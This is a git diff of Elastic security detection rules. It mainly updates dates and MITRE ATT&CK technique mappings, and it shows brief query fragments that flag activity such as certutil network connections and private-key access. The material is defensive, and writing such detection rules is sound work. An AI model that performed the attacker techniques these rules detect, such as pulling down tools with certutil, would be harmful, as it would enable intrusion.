["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -52,19 +52,23 @@ process where host.os.type == "windows" and event.type == "start" and process.ar [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + [[rule.threat.technique]] id = "T1114" name = "Email Collection" reference = "https://attack.mitre.org/techniques/T1114/" + [[rule.threat.technique.subtechnique]] id = "T1114.001" name = "Local Email Collection" reference = "https://attack.mitre.org/techniques/T1114/001/" - - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules_building_block/collection_posh_compression.toml b/rules_building_block/collection_posh_compression.toml index 621b225c547..281482a083f 100644 --- a/rules_building_block/collection_posh_compression.toml +++ b/rules_building_block/collection_posh_compression.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/06" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -207,34 +207,44 @@ value = "?:\\\\Program Files\\\\Azure\\\\StorageSyncAgent\\\\AFSDiag.ps1" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" reference = "https://attack.mitre.org/techniques/T1560/" +[[rule.threat.technique.subtechnique]] +id = "T1560.001" +name = "Archive via Utility" +reference = "https://attack.mitre.org/techniques/T1560/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1560.002" +name = "Archive via Library" +reference = "https://attack.mitre.org/techniques/T1560/002/" [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/command_and_control_bitsadmin_activity.toml b/rules_building_block/command_and_control_bitsadmin_activity.toml index 3952b06069b..d4e57b19af3 100644 --- a/rules_building_block/command_and_control_bitsadmin_activity.toml +++ b/rules_building_block/command_and_control_bitsadmin_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/21" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -57,38 +57,44 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1197" name = "BITS Jobs" reference = "https://attack.mitre.org/techniques/T1197/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1197" -name = "BITS Jobs" -reference = "https://attack.mitre.org/techniques/T1197/" +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/command_and_control_certutil_network_connection.toml b/rules_building_block/command_and_control_certutil_network_connection.toml index 4ed4c5547f0..c4ccf43c4ee 100644 --- a/rules_building_block/command_and_control_certutil_network_connection.toml +++ b/rules_building_block/command_and_control_certutil_network_connection.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/03/19" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [transform] [[transform.investigate]] @@ -163,14 +163,26 @@ network where host.os.type == "windows" and process.name : "certutil.exe" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml b/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml index 5701fe075a7..cb59a5d1761 100644 --- a/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml +++ b/rules_building_block/command_and_control_ollama_model_download_untrusted_source.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/09" integration = ["endpoint"] maturity = "production" -updated_date = "2026/01/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -56,31 +56,36 @@ network where event.action == "lookup_requested" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" + +[[rule.threat.technique.subtechnique]] +id = "T1195.001" +name = "Compromise Software Dependencies and Development Tools" +reference = "https://attack.mitre.org/techniques/T1195/001/" + [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" reference = "https://attack.mitre.org/techniques/T1195/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - diff --git a/rules_building_block/credential_access_entra_id_risk_detection_signal.toml b/rules_building_block/credential_access_entra_id_risk_detection_signal.toml index 74f8692331c..f73fe1603bd 100644 --- a/rules_building_block/credential_access_entra_id_risk_detection_signal.toml +++ b/rules_building_block/credential_access_entra_id_risk_detection_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -54,29 +54,35 @@ event.dataset:o365.audit and event.code:AadRiskDetection [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" diff --git a/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml b/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml index 6eb634e33de..6850fbdf214 100644 --- a/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml +++ b/rules_building_block/credential_access_iis_apppoolsa_pwd_appcmd.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/08/18" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -49,14 +49,23 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules_building_block/credential_access_win_private_key_access.toml b/rules_building_block/credential_access_win_private_key_access.toml index c4ef158a6dc..74149cb7985 100644 --- a/rules_building_block/credential_access_win_private_key_access.toml +++ b/rules_building_block/credential_access_win_private_key_access.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/21" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -74,19 +74,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" + [[rule.threat.technique.subtechnique]] id = "T1552.004" name = "Private Keys" reference = "https://attack.mitre.org/techniques/T1552/004/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules_building_block/defense_evasion_cmd_copy_binary_contents.toml b/rules_building_block/defense_evasion_cmd_copy_binary_contents.toml index b46bd062dc8..47797a8332d 100644 --- a/rules_building_block/defense_evasion_cmd_copy_binary_contents.toml +++ b/rules_building_block/defense_evasion_cmd_copy_binary_contents.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -48,31 +48,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/defense_evasion_dll_hijack.toml b/rules_building_block/defense_evasion_dll_hijack.toml index 87e086c3d31..630b6740fe8 100644 --- a/rules_building_block/defense_evasion_dll_hijack.toml +++ b/rules_building_block/defense_evasion_dll_hijack.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -83,24 +83,18 @@ library where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.001" -name = "DLL" -reference = "https://attack.mitre.org/techniques/T1574/001/" [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml b/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml index 79332fc5371..363c2625cf8 100644 --- a/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml +++ b/rules_building_block/defense_evasion_dotnet_clickonce_dfsvc_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -40,24 +40,28 @@ sequence by user.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" +[[rule.threat.technique.subtechnique]] +id = "T1127.002" +name = "ClickOnce" +reference = "https://attack.mitre.org/techniques/T1127/002/" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.011" name = "Rundll32" reference = "https://attack.mitre.org/techniques/T1218/011/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules_building_block/defense_evasion_download_susp_extension.toml b/rules_building_block/defense_evasion_download_susp_extension.toml index 0e65e8b4c34..2b11ed47d61 100644 --- a/rules_building_block/defense_evasion_download_susp_extension.toml +++ b/rules_building_block/defense_evasion_download_susp_extension.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -61,22 +61,25 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" @@ -87,10 +90,25 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml b/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml index 2eecbdb9c35..263944fd022 100644 --- a/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml +++ b/rules_building_block/defense_evasion_execution_via_visualstudio_prebuildevent.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/26" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -78,26 +78,36 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1127" name = "Trusted Developer Utilities Proxy Execution" reference = "https://attack.mitre.org/techniques/T1127/" + [[rule.threat.technique.subtechnique]] id = "T1127.001" name = "MSBuild" reference = "https://attack.mitre.org/techniques/T1127/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/defense_evasion_generic_deletion.toml b/rules_building_block/defense_evasion_generic_deletion.toml index ba036559b71..4092da460aa 100644 --- a/rules_building_block/defense_evasion_generic_deletion.toml +++ b/rules_building_block/defense_evasion_generic_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/13" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -54,19 +54,33 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1070" name = "Indicator Removal" reference = "https://attack.mitre.org/techniques/T1070/" + [[rule.threat.technique.subtechnique]] id = "T1070.004" name = "File Deletion" reference = "https://attack.mitre.org/techniques/T1070/004/" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules_building_block/defense_evasion_injection_from_msoffice.toml b/rules_building_block/defense_evasion_injection_from_msoffice.toml index 6d1c96172e8..20edb1bd2e4 100644 --- a/rules_building_block/defense_evasion_injection_from_msoffice.toml +++ b/rules_building_block/defense_evasion_injection_from_msoffice.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/25" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -52,43 +52,54 @@ process where host.os.type == "windows" and event.action == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/defense_evasion_masquerading_windows_dll.toml b/rules_building_block/defense_evasion_masquerading_windows_dll.toml index afce0c6f8cd..7a42e416ca9 100644 --- a/rules_building_block/defense_evasion_masquerading_windows_dll.toml +++ b/rules_building_block/defense_evasion_masquerading_windows_dll.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -108,10 +108,12 @@ library where event.action == "load" and dll.Ext.relative_file_creation_time <= [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -122,37 +124,40 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" + +[[rule.threat.technique.subtechnique]] +id = "T1553.002" +name = "Code Signing" +reference = "https://attack.mitre.org/techniques/T1553/002/" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.001" -name = "DLL" -reference = "https://attack.mitre.org/techniques/T1574/001/" [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1554" name = "Compromise Host Software Binary" reference = "https://attack.mitre.org/techniques/T1554/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml b/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml index 884c457808b..4387a5d03f7 100644 --- a/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml +++ b/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/20" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,10 +82,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -96,22 +98,30 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" +[[rule.threat.technique.subtechnique]] +id = "T1553.002" +name = "Code Signing" +reference = "https://attack.mitre.org/techniques/T1553/002/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1554" name = "Compromise Host Software Binary" reference = "https://attack.mitre.org/techniques/T1554/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml b/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml index eb6a59b0199..d685e67b893 100644 --- a/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml +++ b/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -54,30 +54,49 @@ event.dataset:o365.audit and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml b/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml index 6c94369c5a7..53fcb399412 100644 --- a/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml +++ b/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/26" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -59,14 +59,31 @@ process where host.os.type == "windows" and event.action == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/defense_evasion_outlook_suspicious_child.toml b/rules_building_block/defense_evasion_outlook_suspicious_child.toml index a081138d5d5..04c850ef329 100644 --- a/rules_building_block/defense_evasion_outlook_suspicious_child.toml +++ b/rules_building_block/defense_evasion_outlook_suspicious_child.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/01/10" integration = ["endpoint"] maturity = "production" -updated_date = "2025/05/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -72,10 +72,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -86,27 +88,38 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" - [[rule.threat.technique]] id = "T1055" name = "Process Injection" reference = "https://attack.mitre.org/techniques/T1055/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1554" name = "Compromise Host Software Binary" reference = "https://attack.mitre.org/techniques/T1554/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml b/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml index 88639b9b669..f3bea5cad31 100644 --- a/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml +++ b/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/04/16" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -174,39 +174,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" +[[rule.threat.technique.subtechnique]] +id = "T1027.010" +name = "Command Obfuscation" +reference = "https://attack.mitre.org/techniques/T1027/010/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" reference = "https://attack.mitre.org/techniques/T1140/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - 